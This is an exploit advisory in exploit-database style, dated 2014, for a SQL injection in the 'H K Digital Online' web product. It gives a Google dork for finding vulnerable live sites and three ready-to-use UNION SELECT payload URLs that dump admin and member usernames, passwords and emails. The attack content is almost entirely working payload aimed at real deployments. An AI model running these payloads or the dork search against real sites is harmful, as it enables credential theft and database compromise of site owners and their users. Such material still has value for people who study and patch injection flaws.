# Exploit Author: Th3 R0cksT3r
# Exploit Title: H K Digital Online SQL Injection
# Date: 15.02.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.hkdigitalonline.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:".php?id=" intext:"Powered by H K Digital Online."

=== Material's Description ===

An attacker can extract database contents through this SQL injection vulnerability: the `id` parameter of several pages is passed into a SQL query without sanitisation, so a UNION-based injection returns rows from other tables in the page output.

Proof Of Concept:

1. http://localhost/tender_notice.php?id=-23%27+UNION+SELECT+1,2,3,group_concat%28userid,0x3a,password,0x3a,mainadmin%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo--+
2. http://localhost/blog-inner.php?id=-3%27+UNION+SELECT+1,2,3,4,group_concat%28userid,0x3a,password,0x3a,email%29,6,7,8,9,10,11,12+from+admininfo--+
3. http://localhost/storelocator.php?id=-574+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat%28login,0x3a,passwd,0x3a,email%29,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+members--

# Greetz: Back Bone, Illûmïnåté Ðëmøñ, Orions Hunter, Dark Knight Sparda, Gh0st KilL3r, Luge Racer, Code Breaker, Darklord, Devil Prince, Rakhal Beduin, Bakeer Bhai, R007 C0D3, Dipto, 8l@ck 3xplor3r, Sparrow, Bd Matrix, Cyber Blader, BD BLACK HAT and All Bangladeshi Hackers